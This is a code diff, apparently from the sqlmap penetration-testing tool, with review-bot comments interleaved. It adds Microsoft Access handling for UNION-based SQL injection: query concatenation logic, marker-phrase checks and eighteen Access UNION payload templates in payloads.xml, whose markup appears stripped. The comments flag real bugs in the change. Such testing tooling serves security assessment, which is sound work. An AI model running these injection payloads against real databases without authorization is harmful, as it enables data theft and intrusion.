diff --git a/lib/core/agent.py b/lib/core/agent.py
index b4cf4cbba..c1ba3833d 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -500,6 +500,22 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
+ elif Backend.isDbms(DBMS.ACCESS):
+ if fieldsExists:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsSelectCase:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&(SELECT " % kb.misc.start, 1)
+ concatenatedQuery += ")&'%s'" % kb.misc.stop
+ elif fieldsSelectFrom:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery = concatenatedQuery.replace(" FROM ", "&'%s' FROM " % kb.misc.stop, 1)
+ elif fieldsSelect:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsNoSelect:
+ concatenatedQuery = "'%s'&%s&'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
+
else:
concatenatedQuery = query
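Review bot: The `fieldsExists` and `fieldsSelect` branches of the new Access block are byte-identical (the same `replace("SELECT ", ...)` plus `+= "&'%s'"` pair), so either they should be merged as `elif fieldsExists or fieldsSelect:` or, if they are kept apart to mirror the other DBMS branches, that intent deserves a comment. The `"'%s'&" % kb.misc.start` prefix is also repeated in four of the five branches and could be bound once above the chain. A one-line comment on the `elif Backend.isDbms(DBMS.ACCESS):` line such as `# Access concatenates strings with '&', so it cannot share the '+' form of the branch above` would explain why this block exists at all, and the stray blank `+` line before `else:` breaks the visual shape of the elif chain. The enclosing method starts before this hunk.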
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4758392f9..3bb7983a5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -183,7 +183,7 @@ USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" )
FROM_TABLE = {
DBMS.ORACLE: " FROM DUAL",
- DBMS.ACCESS: " FROM MSysAccessObjects%00",
+ DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1"
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 1796b2e21..a883d3b51 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -121,6 +121,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
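Review bot: On the added `phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)` line, `.lower()` is applied to the format template, which contains no letters, so the resulting phrase keeps whatever case kb.misc.start, randQuery and kb.misc.stop have. If a case-insensitive match was intended it would have to be `phrase = ("%s%s%s" % (kb.misc.start, randQuery, kb.misc.stop)).lower()`; the same shape appears on the `phrase2` line of the next hunk and on the existing `content = "%s%s".lower() % (...)` line further down, so all three currently compare case-sensitively and must be changed together or not at all, otherwise a lowercased phrase would never match an unlowercased content. __unionPosition's body starts before this hunk.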
@@ -134,13 +135,14 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
- if content and randQuery in content:
+ if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, kb.uChar, where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
@@ -152,7 +154,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
- if content and ((randQuery in content and randQuery2 not in content) or (randQuery not in content and randQuery2 in content)):
+ if content and ((randQuery in content and phrase2 not in content) or (randQuery not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError()
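Review bot: The changed condition on the `if content and ((randQuery in content and phrase2 not in content) or ...)` line still tests the bare `randQuery` while its counterpart tests the delimited `phrase2`, so the two halves of the exclusive-or check look for different things — the first marker without delimiters, the second with them. Since the earlier hunk builds `phrase` for exactly this purpose in what appears to be the same `for position` loop, the symmetric form would be `if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):`, assuming `phrase` is still in scope at this point. __unionPosition continues past this hunk.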
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 426dd4d89..a5af03428 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2893,6 +2893,402 @@ Formats:
+
+ Microsoft Access UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
3